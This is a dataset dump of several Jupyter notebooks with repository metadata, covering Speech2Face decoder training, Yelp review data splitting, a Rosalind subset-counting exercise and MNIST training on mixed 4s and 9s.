ConvTranspose2d-15 [-1, 128, 28, 28] 819,328\n ReLU-16 [-1, 128, 28, 28] 0\n BatchNorm2d-17 [-1, 128, 28, 28] 256\n ConvTranspose2d-18 [-1, 64, 56, 56] 204,864\n ReLU-19 [-1, 64, 56, 56] 0\n BatchNorm2d-20 [-1, 64, 56, 56] 128\n ConvTranspose2d-21 [-1, 32, 112, 112] 51,232\n ReLU-22 [-1, 32, 112, 112] 0\n BatchNorm2d-23 [-1, 32, 112, 112] 64\n ConvTranspose2d-24 [-1, 32, 224, 224] 25,632\n ReLU-25 [-1, 32, 224, 224] 0\n BatchNorm2d-26 [-1, 32, 224, 224] 64\n Conv2d-27 [-1, 3, 224, 224] 99\n BatchNorm2d-28 [-1, 3, 224, 224] 6\n ReLU-29 [-1, 3, 224, 224] 0\n================================================================\nTotal params: 57,055,793\nTrainable params: 57,055,793\nNon-trainable params: 0\n----------------------------------------------------------------\nInput size (MB): 0.02\nForward/backward pass size (MB): 57.09\nParams size (MB): 217.65\nEstimated Total Size (MB): 274.75\n----------------------------------------------------------------\n" ] ], [ [ "# Training", "_____no_output_____" ] ], [ [ "import os\noptimizer = torch.optim.Adam(model.parameters(), lr=0.009)\ncriterion_1 = nn.MSELoss()\ncriterion_2 = nn.L1Loss()\ncriterion_3 = nn.CosineEmbeddingLoss()\nalpha = 0.0002\nbeta = 1.0\ngamma = 1.5\nl = 10\nBATCH = 10\nWORKER = 0\nSAMPLE = 20\nnum_epochs = 5\nsim = torch.ones((BATCH,1, 128 ))\ntrain_dataset = Decoder_Dataset(\"/content/drive/My Drive/Speech2Face/data_test/faces/\", sample = SAMPLE, VggL = \"vgg16\")\ntrain_loader = torch.utils.data.DataLoader(dataset=train_dataset, \n\t\t batch_size=BATCH, \n\t\t num_workers =WORKER,\n\t\t shuffle=False)", "3630\n" ], [ "#! mkdir checkpoint", "_____no_output_____" ], [ "import nvidia_smi\nimport psutil\nimport platform\n\nnvidia_smi.nvmlInit()\nhandle = nvidia_smi.nvmlDeviceGetHandleByIndex(0)", "_____no_output_____" ], [ "from datetime import datetime\n\nimport torch\nimport torchvision.models.vgg as models\n\nvgg16 = models.vgg16(pretrained=True)\nvgg16.classifier = vgg16.classifier[:-1]\nvgg = vgg16\nvgg.cuda()\n\nfor epoch in range(num_epochs):\n print(\"Epoch\", epoch)\n running_loss = 0.0\n running_loss_1 = 0.0\n running_loss_2 = 0.0\n start_time = time()\n for i,(img, landm) in enumerate(train_loader):\n \n # Move tensors to the configured device\n img = img.to(device)\n landm = landm.to(device)\n #print(\"input\",img.size(), landm.size())\n\n feature = vgg(img.reshape((-1,3, 224,224)))\n print(feature.shape)\n #print(\"vgg\",feature.size())\n # Forward pass\n outL, outT = model(feature)\n #print(\"output \", outL.size(), outT.size())\n \n outL = outL.squeeze(1)\n\n loss_1 = criterion_1(outL, landm)\n loss_2 = criterion_2(outT, img)\n running_loss_1 += loss_1.item()\n running_loss_2 += loss_2.item()\n\n # img_ = outT.cpu().detach().numpy()\n # outL_ = outL.cpu().detach().numpy()\n # outL_ = np.dstack((outL_[:,0::2],outL_[:,1::2]))\n # #print(\"land np img np \", outL_.shape, img_.shape)\n # img_t = (img_.reshape(-1,224,224,3)*255).astype(np.uint8)\n # #print(\"img_t \",img_t.shape, img_t[0])\n # if epoch in [0, 1]:\n # src, flag = face_landmark(img_t)\n # if flag:\n # for f in flag:\n # src[f] = outL_[f]\n # else:\n # outL_ = landm.cpu().detach().numpy()\n # img_ = image_warping(img_.astype(np.float32), src.astype(np.float32), outL_.astype(np.float32))\n # \n # # print(img_.size(), type(img_))\n # # print(feature.size())\n # img_ = img_.reshape(((-1, 224, 224, 3))) * 255.0\n # \n # feature_out = face_recognition.face_encodings((img_ ).astype(np.uint8))[0]\n # # print(feature_out.size(), sim.size())\n # loss_3 = criterion_3(feature_out.view(BATCH,1,128).to(device), feature.view(BATCH,1,128), sim.view(BATCH,1,128).to(device))\n # running_loss_3 += loss_3.item()\n\n\n loss = (alpha*loss_1 + beta*loss_2 )*100\n # Backward and optimize\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n running_loss += loss.item()\n\n if i % l == 0:\n # writer.add_scalar('training loss',running_loss/ data[\"show\"],epoch * len(train_loader) + i)\n res = nvidia_smi.nvmlDeviceGetUtilizationRates(handle)\n print('{} : Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}, gpu: {}%, gpu-mem: {}%, RAM: {}% , RAM Mem {}%, running_loss: {:.4f}, MSEloss {:.4f}, MAEloss {:.4f}, time: {:.4f}, '.format(datetime.now() ,epoch+1, num_epochs, i,int((train_dataset.__len__()/BATCH)), loss.item(),res.gpu, res.memory,psutil.cpu_percent(),psutil.virtual_memory()[2],running_loss/(BATCH*l),running_loss_1/(BATCH*l), running_loss_2/(BATCH*l), (time()- start_time)))\n #print(f'gpu: {res.gpu}%, gpu-mem: {res.memory}%, RAM: {psutil.cpu_percent()}% , RAM Mem {psutil.virtual_memory()[2]}%')\n running_loss = 0.0\n start_time = time()\n running_loss_1 = 0.0\n running_loss_2 = 0.0\n running_loss_3 = 0.0\n \n inv_normalize = transforms.Normalize(\n mean=[-0.485/0.229, -0.456/0.224, -0.406/0.225],\n std=[1/0.229, 1/0.224, 1/0.255]\n )\n\n img1 = outT.cpu().detach().numpy().reshape(-1, 224, 224, 3) * 255\n # Va inserito la riconversione\n\n cv2_imshow(img1[0].astype(np.uint8))\n\n\n \n\n \n\n outL = outL.cpu().detach().numpy()\n outL = np.dstack((outL[:,0::2],outL[:,1::2]))\n #print(\"land np img np \", outL_.shape, img_.shape)\n img1 = (img1.reshape(-1,224,224,3)).astype(np.uint8)\n #print(\"img_t \",img_t.shape, img_t[0])\n src, flag = face_landmark(img1)\n if flag:\n for r in flag:\n src[r] = outL[r]\n\n result = image_warping(img1.astype(np.float32), src.astype(np.float32), outL.astype(np.float32))\n\n img = (img.cpu().detach().numpy().reshape(-1,224,224,3))\n img_t = torch.tensor(img[0])\n print(img_t.shape)\n img = inv_normalize(img_t.reshape((3,224,224))) * 254.0\n cv2_imshow(img.reshape(224,224,3).numpy().astype(np.uint8))\n cv2_imshow(result[0])\n \n torch.save({'epoch': epoch,'model_state_dict': model.state_dict(),'optimizer_state_dict': optimizer.state_dict(), 'loss': loss}, \"/content/drive/My Drive/Speech2Face/check_poit_decoder/epoch_{}.pth\".format(epoch + 1))", "Epoch 0\ntorch.Size([10, 4096])\n2020-08-17 10:20:32.410867 : Epoch [1/5], Step [0/7260], Loss: 228.6088, gpu: 88%, gpu-mem: 40%, RAM: 7.0% , RAM Mem 26.5%, running_loss: 2.2861, MSEloss 53.3279, MAEloss 0.0122, time: 0.9088, \n" ], [ "model = DECODER('eval')\nstate = torch.load('/content/drive/My Drive/Speech2Face/check_poit_decoder/epoch_15.pth')\nmodel.load_state_dict(state['model_state_dict'])\n", "_____no_output_____" ], [ "path = \"/content/drive/My Drive/Speech2Face/data_test/test/n000078/0002_02.jpg\"\nimg = cv2.cvtColor(cv2.imread(path), cv2.COLOR_BGR2RGB)\nfaceLoc = face_recognition.face_locations(img)\n\nx,y1,x1,y = faceLoc[0]\nimg = img[x:x1,y:y1]\nImage.fromarray(img)", "_____no_output_____" ], [ "img = cv2.resize(img, (224,224), interpolation = cv2.INTER_AREA)\nbiden_encoding = face_recognition.face_encodings(img)[0]\nencoded = torch.reshape(torch.from_numpy(biden_encoding).float(), (-1, 128))\n\noutT = model(encoded) \nout = torch.tensor(outT)\nout = np.squeeze(out)\nout = out.reshape(224,224,3)\n\nImage.fromarray(out.numpy())", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code" ] ]
e73007589aa55209211b1eed9ffa4122687ef402
11,522
ipynb
Jupyter Notebook
preprocess/split622data.ipynb
yang-233/mmsa
eed7b943746041b735d8a7af8d60b6457f0284f6
[ "MIT" ]
1
2021-04-20T07:03:50.000Z
2021-04-20T07:03:50.000Z
preprocess/split622data.ipynb
yang-233/mmsa
eed7b943746041b735d8a7af8d60b6457f0284f6
[ "MIT" ]
null
null
null
preprocess/split622data.ipynb
yang-233/mmsa
eed7b943746041b735d8a7af8d60b6457f0284f6
[ "MIT" ]
null
null
null
31.224932
1,228
0.536452
[ [ [ "import json\nimport os\nimport pickle\nfrom tqdm import tqdm\nfrom typing import *\nimport random\nimport numpy as np\nimport shutil\nfrom multiprocessing import Pool\nseed = 1945 # 种子值\nnp.random.seed(seed)\nrandom.seed(seed)", "_____no_output_____" ], [ "cities = ['Boston', 'Chicago', 'Los Angeles', 'New York', 'San Francisco']\nbase_dir = os.path.join(\"data\",\"yelp-vistanet\")\nraw_dir = os.path.join(base_dir, \"raw\")\nraw_train_file = os.path.join(raw_dir, \"train.json\")\nraw_valid_file = os.path.join(raw_dir, \"valid.json\")\nraw_test_files = [os.path.join(raw_dir, \"test\", f\"{city}_test.json\") for city in cities]\nbase_dir, raw_dir, raw_train_file, raw_valid_file, raw_test_files", "_____no_output_____" ], [ "photos_dir = os.path.join(base_dir, \"photos\")\nphotos_dir", "_____no_output_____" ], [ "def check_photo(_id:str):\n path = os.path.join(photos_dir, _id[:2], _id + \".jpg\")\n return os.path.exists(path)", "_____no_output_____" ], [ "def read_reviews(file_path:str, clean_data:bool) -> List[Dict[str, str]]: \n # 读入数据\n reviews = None\n if file_path.endswith(\".json\"):\n with open(file_path, 'r', encoding=\"utf-8\") as f:\n reviews = []\n for line in tqdm(f, \"Read json\"):\n review = json.loads(line)\n imgs = []\n captions = []\n for photo in review['Photos']:\n _id = photo['_id']\n caption = photo[\"Caption\"]\n if clean_data:\n if check_photo(_id):\n imgs.append(_id)\n captions.append(caption)\n else:\n imgs.append(_id)\n captions.append(caption)\n reviews.append({'_id': review['_id'],\n 'Text': review['Text'],\n 'Photos': imgs,\n 'Captions': captions,\n 'Rating': review['Rating']})\n elif file_pathle.endswith(\".pickle\"):\n with open(file_path, 'rb') as f:\n reviews = pickle.load(f) # 直接从pickle中加载\n else:\n raise RuntimeError(\"Illegal file path!\")\n return reviews", "_____no_output_____" ], [ "pathes = [raw_train_file, raw_valid_file, *raw_test_files]\npathes", "_____no_output_____" ], [ "total = []\nfor path in pathes:\n total += read_reviews(path, True)\nlen(total)", "Read json: 35435it [00:09, 3791.53it/s] \nRead json: 2215it [00:00, 15372.57it/s]\nRead json: 315it [00:00, 8599.75it/s]\nRead json: 325it [00:00, 10662.26it/s]\nRead json: 3730it [00:00, 19220.10it/s]\nRead json: 1715it [00:00, 17650.33it/s]\nRead json: 570it [00:00, 14839.91it/s]\n" ], [ "total[0]", "_____no_output_____" ], [ "random.shuffle(total)\ntotal[0]", "_____no_output_____" ], [ "dividing_point = len(total) // 5\nclear_data = {}\nclear_data[\"train\"] = total[:-2*dividing_point]\nclear_data[\"valid\"] = total[-2*dividing_point:-dividing_point]\nclear_data[\"test\"] = total[-dividing_point:]\nlen(clear_data[\"train\"]), len(clear_data[\"valid\"]), len(clear_data[\"test\"])", "_____no_output_____" ], [ "_622_base_dir = os.path.join(base_dir, \"622data\")\nclear_data_file = os.path.join(_622_base_dir, \"clear_data.pickle\")\nclear_data_file", "_____no_output_____" ], [ "with open(clear_data_file, \"wb\") as o:\n pickle.dump(clear_data, o, protocol=pickle.HIGHEST_PROTOCOL)", "_____no_output_____" ], [ "def get_imgs(reviews):\n res = []\n for r in reviews:\n res += r[\"Photos\"]\n return res", "_____no_output_____" ], [ "all_imgs_id = get_imgs(clear_data[\"train\"]) + get_imgs(clear_data[\"valid\"]) + get_imgs(clear_data[\"test\"])\nlen(all_imgs_id)", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ] ]
e73016ef1af3e194594c98d3dda8f81ea41b9bf9
1,386
ipynb
Jupyter Notebook
SSET.ipynb
anilk991/rosalindsolutions
1548b57fa6fbf04ec9968bc8ab47668d37c765d7
[ "MIT" ]
null
null
null
SSET.ipynb
anilk991/rosalindsolutions
1548b57fa6fbf04ec9968bc8ab47668d37c765d7
[ "MIT" ]
null
null
null
SSET.ipynb
anilk991/rosalindsolutions
1548b57fa6fbf04ec9968bc8ab47668d37c765d7
[ "MIT" ]
null
null
null
15.931034
34
0.455267
[ [ [ "def nSubsets(n):\n '''\n '''\n return (2**n)%1000000", "_____no_output_____" ], [ "print(nSubsets(3))", "8\n" ], [ "n = 835\nprint(nSubsets(835))", "362368\n" ] ] ]
[ "code" ]
[ [ "code", "code", "code" ] ]
e7301a6c8570d1e06559de49c91454ead9360f44
322,208
ipynb
Jupyter Notebook
fdm/fdm_code/failure_in_4_9.ipynb
yurilavinas/failure_diversity_maximisation
24d5b90455eb554bc91b6092df53d83f4b1023df
[ "Apache-2.0" ]
null
null
null
fdm/fdm_code/failure_in_4_9.ipynb
yurilavinas/failure_diversity_maximisation
24d5b90455eb554bc91b6092df53d83f4b1023df
[ "Apache-2.0" ]
null
null
null
fdm/fdm_code/failure_in_4_9.ipynb
yurilavinas/failure_diversity_maximisation
24d5b90455eb554bc91b6092df53d83f4b1023df
[ "Apache-2.0" ]
null
null
null
105.711286
102,656
0.760537
[ [ [ "import torch\nimport torch.nn as nn\nimport torchvision.datasets as dsets\nimport torchvision.transforms as transforms \nfrom torch.autograd import Variable\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torchvision\n\nimport pandas as pd\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.manifold import TSNE\nfrom sklearn.decomposition import PCA\nimport seaborn as sns\n\nimport random\nfrom torch.utils.data import Dataset\nimport os\nimport copy", "_____no_output_____" ], [ "input_size = 784\nhidden_size = 500 \nnum_classes = 10 \nnum_epochs = 60\nbatch_size = 100\nlearning_rate = 1e-3", "_____no_output_____" ], [ "def acc(n, train):\n\n correct = 0\n total = 0\n\n for images, labels in train:\n images = Variable(images.view(-1, 28*28))\n outputs = n(images)\n _, predicted = torch.max(outputs.data, 1) \n total += labels.size(0) \n correct += (predicted == labels).sum() \n\n print('Accuracy of the network train images: %d %%' % (100 * correct / total))\n", "_____no_output_____" ], [ "train_dataset = dsets.MNIST(root='./data',\n train=True,\n transform=transforms.ToTensor(),\n download=False)\n\ntest_dataset = dsets.MNIST(root='./data',\n train=False,\n transform=transforms.ToTensor(),\n download=False)", "_____no_output_____" ], [ "train = torch.utils.data.DataLoader(dataset=train_dataset,\n batch_size=batch_size,\n num_workers = 1,\n shuffle=True)\n\ntest = torch.utils.data.DataLoader(dataset=test_dataset,\n batch_size=batch_size,\n num_workers = 1,\n shuffle=True)", "_____no_output_____" ] ], [ [ "Getting only data of 4s and 9s", "_____no_output_____" ] ], [ [ "new_labels_4 = []\nnew_images_4 = []\n\nnew_labels_9 = []\nnew_images_9 = []\n\nfor images, labels in train:\n images = Variable(images.view(-1, 28*28))\n for i,label in enumerate(labels):\n if label == 4:\n new_labels_4.append(label)\n new_images_4.append(images[i].numpy())\n elif label == 9:\n new_labels_9.append(label)\n new_images_9.append(images[i].numpy())", "_____no_output_____" ], [ "f_labels = []\nf_images = []", "_____no_output_____" ], [ "threshold_border = 0.9\nn_changes = 500\n\n\nfor k, image_4 in enumerate(new_images_4):\n if random.random() > threshold_border:\n #change image_4 adding information from new_images_9\n i = 0\n while(i < n_changes):\n j = random.randint(0,len(image_4)-1)\n image_4[j] = copy.deepcopy(new_images_9[random.randint(0,len(new_images_9)-1)][j])\n i += 1 \n f_labels.append(new_labels_4[k])\n f_images.append(torch.from_numpy(image_4))", "_____no_output_____" ] ], [ [ "How the output is like after mixing 4s with some 9 data", "_____no_output_____" ] ], [ [ "fig = plt.figure(figsize=(8,8));\ncolumns = 4;\nrows = 5;\n\nfor i in range(1, columns*rows +1):\n img_xy = np.random.randint(len(new_images_4))\n img = torch.from_numpy(new_images_4[img_xy])\n img.resize_(28,28)\n fig.add_subplot(rows, columns, i)\n plt.axis('off')\n plt.imshow(img, cmap='gray')\nplt.show()", "_____no_output_____" ], [ "threshold_border = 0.9\nn_changes = 500\n\nfor k, image_9 in enumerate(new_images_9):\n if random.random() > threshold_border:\n #change image_9 adding information from new_images_4\n i = 0\n while(i < n_changes):\n j = random.randint(0,len(image_9)-1)\n image_9[j] = copy.deepcopy(new_images_4[random.randint(0,len(new_images_4)-1)][j])\n i += 1 \n f_labels.append(new_labels_9[k])\n f_images.append(torch.from_numpy(image_9))", "_____no_output_____" ] ], [ [ "How the output is like after mixing 9s with some 4 data", "_____no_output_____" ] ], [ [ "fig = plt.figure(figsize=(8,8));\ncolumns = 4;\nrows = 5;\n\nfor i in range(1, columns*rows +1):\n img_xy = np.random.randint(len(new_images_9))\n img = torch.from_numpy(new_images_9[img_xy])\n img.resize_(28,28)\n fig.add_subplot(rows, columns, i)\n plt.axis('off')\n plt.imshow(img, cmap='gray')\nplt.show()", "_____no_output_____" ], [ "class Net(nn.Module):\n def __init__(self, input_size, hidden_size, num_classes):\n super(Net, self).__init__() \n self.fc1 = nn.Linear(input_size, hidden_size) \n self.relu = nn.ReLU() \n \n self.fc2 = nn.Linear(hidden_size, int(hidden_size)) \n self.relu2 = nn.ReLU() \n \n self.fc4 = nn.Linear(int(hidden_size), num_classes) \n \n # Define proportion or neurons to dropout\n# self.dropout = nn.Dropout(0.2)\n \n def forward(self, x): \n \n# x = self.dropout(x)\n out = self.fc1(x)\n out = self.relu(out)\n\n# out = self.dropout(out)\n out = self.fc2(out)\n out = self.relu2(out) \n \n# out = self.dropout(out) \n out = self.fc4(out)\n return out", "_____no_output_____" ] ], [ [ "Net with mixed data", "_____no_output_____" ] ], [ [ "net3 = Net(input_size, hidden_size, num_classes)\ncriterion = nn.CrossEntropyLoss()\noptimizer = torch.optim.SGD(net3.parameters(), lr=learning_rate)\n\nlosses = []\n\nfor epoch in range(num_epochs):\n for i in range(int(len(f_images)/batch_size)):\n idx = list(range(batch_size*i,(batch_size*(i+1))))\n images = [f_images[id] for id in idx]\n labels = [f_labels[id] for id in idx]\n \n images = torch.stack(images)\n labels = torch.stack(labels)\n\n \n optimizer.zero_grad() \n outputs = net3(images) \n \n\n\n loss = criterion(outputs, labels) \n loss.backward() \n optimizer.step() \n \n losses.append(loss.item())\n \n if (i+1) % 600 == 0: \n\n print('Epoch [%d/%d], Step [%d/%d], Loss: %.4f'\n %(epoch+1, num_epochs, i+1, len(train)//batch_size, loss.item()))\n\n acc(net3, train)\n", "Epoch [1/60], Step [600/6], Loss: 0.0528\nEpoch [1/60], Step [1200/6], Loss: 0.0109\nEpoch [1/60], Step [1800/6], Loss: 0.0091\nEpoch [1/60], Step [2400/6], Loss: 0.0026\nEpoch [1/60], Step [3000/6], Loss: 0.0005\nEpoch [1/60], Step [3600/6], Loss: 0.0048\nEpoch [1/60], Step [4200/6], Loss: 0.0014\nEpoch [1/60], Step [4800/6], Loss: 0.0070\nEpoch [1/60], Step [5400/6], Loss: 0.0062\nEpoch [1/60], Step [6000/6], Loss: 0.0025\nEpoch [1/60], Step [6600/6], Loss: 0.0010\nEpoch [1/60], Step [7200/6], Loss: 0.0009\nEpoch [1/60], Step [7800/6], Loss: 0.0001\nEpoch [1/60], Step [8400/6], Loss: 0.0003\nEpoch [1/60], Step [9000/6], Loss: 0.0001\nEpoch [1/60], Step [9600/6], Loss: 0.0025\nEpoch [1/60], Step [10200/6], Loss: 0.0003\nEpoch [1/60], Step [10800/6], Loss: 0.0001\nEpoch [1/60], Step [11400/6], Loss: 0.0003\nEpoch [1/60], Step [12000/6], Loss: 0.0001\nEpoch [1/60], Step [12600/6], Loss: 0.0008\nEpoch [1/60], Step [13200/6], Loss: 0.0036\nEpoch [1/60], Step [13800/6], Loss: 0.0007\nEpoch [1/60], Step [14400/6], Loss: 0.0005\nEpoch [1/60], Step [15000/6], Loss: 0.0006\nEpoch [1/60], Step [15600/6], Loss: 0.0000\nEpoch [1/60], Step [16200/6], Loss: 0.0001\nEpoch [1/60], Step [16800/6], Loss: 0.0018\nEpoch [1/60], Step [17400/6], Loss: 0.0002\nEpoch [1/60], Step [18000/6], Loss: 0.0014\nEpoch [1/60], Step [18600/6], Loss: 0.0003\nEpoch [1/60], Step [19200/6], Loss: 0.0001\nEpoch [1/60], Step [19800/6], Loss: 0.0000\nEpoch [1/60], Step [20400/6], Loss: 0.0000\nEpoch [1/60], Step [21000/6], Loss: 0.1191\nEpoch [1/60], Step [21600/6], Loss: 0.0050\nEpoch [1/60], Step [22200/6], Loss: 0.0031\nEpoch [1/60], Step [22800/6], Loss: 0.0047\nEpoch [1/60], Step [23400/6], Loss: 0.0013\nEpoch [2/60], Step [600/6], Loss: 0.0144\nEpoch [2/60], Step [1200/6], Loss: 0.0064\nEpoch [2/60], Step [1800/6], Loss: 0.0055\nEpoch [2/60], Step [2400/6], Loss: 0.0021\nEpoch [2/60], Step [3000/6], Loss: 0.0005\nEpoch [2/60], Step [3600/6], Loss: 0.0038\nEpoch [2/60], Step [4200/6], Loss: 0.0011\nEpoch [2/60], Step [4800/6], Loss: 0.0052\nEpoch [2/60], Step [5400/6], Loss: 0.0042\nEpoch [2/60], Step [6000/6], Loss: 0.0020\nEpoch [2/60], Step [6600/6], Loss: 0.0008\nEpoch [2/60], Step [7200/6], Loss: 0.0007\nEpoch [2/60], Step [7800/6], Loss: 0.0001\nEpoch [2/60], Step [8400/6], Loss: 0.0003\nEpoch [2/60], Step [9000/6], Loss: 0.0001\nEpoch [2/60], Step [9600/6], Loss: 0.0021\nEpoch [2/60], Step [10200/6], Loss: 0.0003\nEpoch [2/60], Step [10800/6], Loss: 0.0001\nEpoch [2/60], Step [11400/6], Loss: 0.0003\nEpoch [2/60], Step [12000/6], Loss: 0.0001\nEpoch [2/60], Step [12600/6], Loss: 0.0008\nEpoch [2/60], Step [13200/6], Loss: 0.0027\nEpoch [2/60], Step [13800/6], Loss: 0.0006\nEpoch [2/60], Step [14400/6], Loss: 0.0004\nEpoch [2/60], Step [15000/6], Loss: 0.0005\nEpoch [2/60], Step [15600/6], Loss: 0.0000\nEpoch [2/60], Step [16200/6], Loss: 0.0001\nEpoch [2/60], Step [16800/6], Loss: 0.0013\nEpoch [2/60], Step [17400/6], Loss: 0.0002\nEpoch [2/60], Step [18000/6], Loss: 0.0011\nEpoch [2/60], Step [18600/6], Loss: 0.0002\nEpoch [2/60], Step [19200/6], Loss: 0.0001\nEpoch [2/60], Step [19800/6], Loss: 0.0000\nEpoch [2/60], Step [20400/6], Loss: 0.0000\nEpoch [2/60], Step [21000/6], Loss: 0.0492\nEpoch [2/60], Step [21600/6], Loss: 0.0035\nEpoch [2/60], Step [22200/6], Loss: 0.0022\nEpoch [2/60], Step [22800/6], Loss: 0.0034\nEpoch [2/60], Step [23400/6], Loss: 0.0011\nEpoch [3/60], Step [600/6], Loss: 0.0111\nEpoch [3/60], Step [1200/6], Loss: 0.0055\nEpoch [3/60], Step [1800/6], Loss: 0.0044\nEpoch [3/60], Step [2400/6], Loss: 0.0018\nEpoch [3/60], Step [3000/6], Loss: 0.0005\nEpoch [3/60], Step [3600/6], Loss: 0.0033\nEpoch [3/60], Step [4200/6], Loss: 0.0009\nEpoch [3/60], Step [4800/6], Loss: 0.0043\nEpoch [3/60], Step [5400/6], Loss: 0.0033\nEpoch [3/60], Step [6000/6], Loss: 0.0018\nEpoch [3/60], Step [6600/6], Loss: 0.0007\nEpoch [3/60], Step [7200/6], Loss: 0.0006\nEpoch [3/60], Step [7800/6], Loss: 0.0001\nEpoch [3/60], Step [8400/6], Loss: 0.0003\nEpoch [3/60], Step [9000/6], Loss: 0.0001\nEpoch [3/60], Step [9600/6], Loss: 0.0019\nEpoch [3/60], Step [10200/6], Loss: 0.0003\nEpoch [3/60], Step [10800/6], Loss: 0.0001\nEpoch [3/60], Step [11400/6], Loss: 0.0003\nEpoch [3/60], Step [12000/6], Loss: 0.0001\nEpoch [3/60], Step [12600/6], Loss: 0.0008\nEpoch [3/60], Step [13200/6], Loss: 0.0022\nEpoch [3/60], Step [13800/6], Loss: 0.0005\nEpoch [3/60], Step [14400/6], Loss: 0.0004\nEpoch [3/60], Step [15000/6], Loss: 0.0005\nEpoch [3/60], Step [15600/6], Loss: 0.0000\nEpoch [3/60], Step [16200/6], Loss: 0.0001\nEpoch [3/60], Step [16800/6], Loss: 0.0010\nEpoch [3/60], Step [17400/6], Loss: 0.0002\nEpoch [3/60], Step [18000/6], Loss: 0.0010\nEpoch [3/60], Step [18600/6], Loss: 0.0002\nEpoch [3/60], Step [19200/6], Loss: 0.0001\nEpoch [3/60], Step [19800/6], Loss: 0.0000\nEpoch [3/60], Step [20400/6], Loss: 0.0000\nEpoch [3/60], Step [21000/6], Loss: 0.0421\nEpoch [3/60], Step [21600/6], Loss: 0.0031\nEpoch [3/60], Step [22200/6], Loss: 0.0020\nEpoch [3/60], Step [22800/6], Loss: 0.0030\nEpoch [3/60], Step [23400/6], Loss: 0.0010\nEpoch [4/60], Step [600/6], Loss: 0.0102\nEpoch [4/60], Step [1200/6], Loss: 0.0053\nEpoch [4/60], Step [1800/6], Loss: 0.0039\nEpoch [4/60], Step [2400/6], Loss: 0.0017\nEpoch [4/60], Step [3000/6], Loss: 0.0005\nEpoch [4/60], Step [3600/6], Loss: 0.0032\nEpoch [4/60], Step [4200/6], Loss: 0.0008\nEpoch [4/60], Step [4800/6], Loss: 0.0039\nEpoch [4/60], Step [5400/6], Loss: 0.0029\nEpoch [4/60], Step [6000/6], Loss: 0.0017\nEpoch [4/60], Step [6600/6], Loss: 0.0007\nEpoch [4/60], Step [7200/6], Loss: 0.0005\nEpoch [4/60], Step [7800/6], Loss: 0.0001\nEpoch [4/60], Step [8400/6], Loss: 0.0002\nEpoch [4/60], Step [9000/6], Loss: 0.0001\nEpoch [4/60], Step [9600/6], Loss: 0.0019\nEpoch [4/60], Step [10200/6], Loss: 0.0003\nEpoch [4/60], Step [10800/6], Loss: 0.0001\nEpoch [4/60], Step [11400/6], Loss: 0.0003\nEpoch [4/60], Step [12000/6], Loss: 0.0001\nEpoch [4/60], Step [12600/6], Loss: 0.0008\nEpoch [4/60], Step [13200/6], Loss: 0.0020\nEpoch [4/60], Step [13800/6], Loss: 0.0005\nEpoch [4/60], Step [14400/6], Loss: 0.0004\nEpoch [4/60], Step [15000/6], Loss: 0.0004\nEpoch [4/60], Step [15600/6], Loss: 0.0000\nEpoch [4/60], Step [16200/6], Loss: 0.0001\nEpoch [4/60], Step [16800/6], Loss: 0.0009\nEpoch [4/60], Step [17400/6], Loss: 0.0002\nEpoch [4/60], Step [18000/6], Loss: 0.0009\nEpoch [4/60], Step [18600/6], Loss: 0.0002\nEpoch [4/60], Step [19200/6], Loss: 0.0001\nEpoch [4/60], Step [19800/6], Loss: 0.0000\nEpoch [4/60], Step [20400/6], Loss: 0.0000\nEpoch [4/60], Step [21000/6], Loss: 0.0396\nEpoch [4/60], Step [21600/6], Loss: 0.0030\nEpoch [4/60], Step [22200/6], Loss: 0.0018\nEpoch [4/60], Step [22800/6], Loss: 0.0027\nEpoch [4/60], Step [23400/6], Loss: 0.0010\nEpoch [5/60], Step [600/6], Loss: 0.0098\nEpoch [5/60], Step [1200/6], Loss: 0.0054\nEpoch [5/60], Step [1800/6], Loss: 0.0036\nEpoch [5/60], Step [2400/6], Loss: 0.0017\nEpoch [5/60], Step [3000/6], Loss: 0.0005\nEpoch [5/60], Step [3600/6], Loss: 0.0032\nEpoch [5/60], Step [4200/6], Loss: 0.0007\nEpoch [5/60], Step [4800/6], Loss: 0.0037\nEpoch [5/60], Step [5400/6], Loss: 0.0027\nEpoch [5/60], Step [6000/6], Loss: 0.0016\nEpoch [5/60], Step [6600/6], Loss: 0.0006\nEpoch [5/60], Step [7200/6], Loss: 0.0005\nEpoch [5/60], Step [7800/6], Loss: 0.0001\nEpoch [5/60], Step [8400/6], Loss: 0.0002\nEpoch [5/60], Step [9000/6], Loss: 0.0001\nEpoch [5/60], Step [9600/6], Loss: 0.0018\nEpoch [5/60], Step [10200/6], Loss: 0.0003\nEpoch [5/60], Step [10800/6], Loss: 0.0001\nEpoch [5/60], Step [11400/6], Loss: 0.0003\nEpoch [5/60], Step [12000/6], Loss: 0.0001\nEpoch [5/60], Step [12600/6], Loss: 0.0008\nEpoch [5/60], Step [13200/6], Loss: 0.0018\nEpoch [5/60], Step [13800/6], Loss: 0.0004\nEpoch [5/60], Step [14400/6], Loss: 0.0004\nEpoch [5/60], Step [15000/6], Loss: 0.0004\nEpoch [5/60], Step [15600/6], Loss: 0.0000\nEpoch [5/60], Step [16200/6], Loss: 0.0001\nEpoch [5/60], Step [16800/6], Loss: 0.0008\nEpoch [5/60], Step [17400/6], Loss: 0.0002\nEpoch [5/60], Step [18000/6], Loss: 0.0009\nEpoch [5/60], Step [18600/6], Loss: 0.0002\nEpoch [5/60], Step [19200/6], Loss: 0.0001\nEpoch [5/60], Step [19800/6], Loss: 0.0000\nEpoch [5/60], Step [20400/6], Loss: 0.0000\nEpoch [5/60], Step [21000/6], Loss: 0.0385\nEpoch [5/60], Step [21600/6], Loss: 0.0030\nEpoch [5/60], Step [22200/6], Loss: 0.0017\n" ], [ "acc(net3, train)", "Accuracy of the network train images: 10 %\n" ], [ "## Evaluate the model\ncorrect = 0\ntotal = 0\ni = 0\nfor images2, labels2 in test:\n \n images = Variable(images2.view(-1, 28*28))\n \n \n outputs = net3(images)\n _, predicted = torch.max(outputs.data, 1) \n total += labels2.size(0) \n correct += (predicted == labels2).sum() \n i += 1\n \nprint('Accuracy of the network on the 10K test images: %d %%' % (100 * correct / total))", "Accuracy of the network on the 10K test 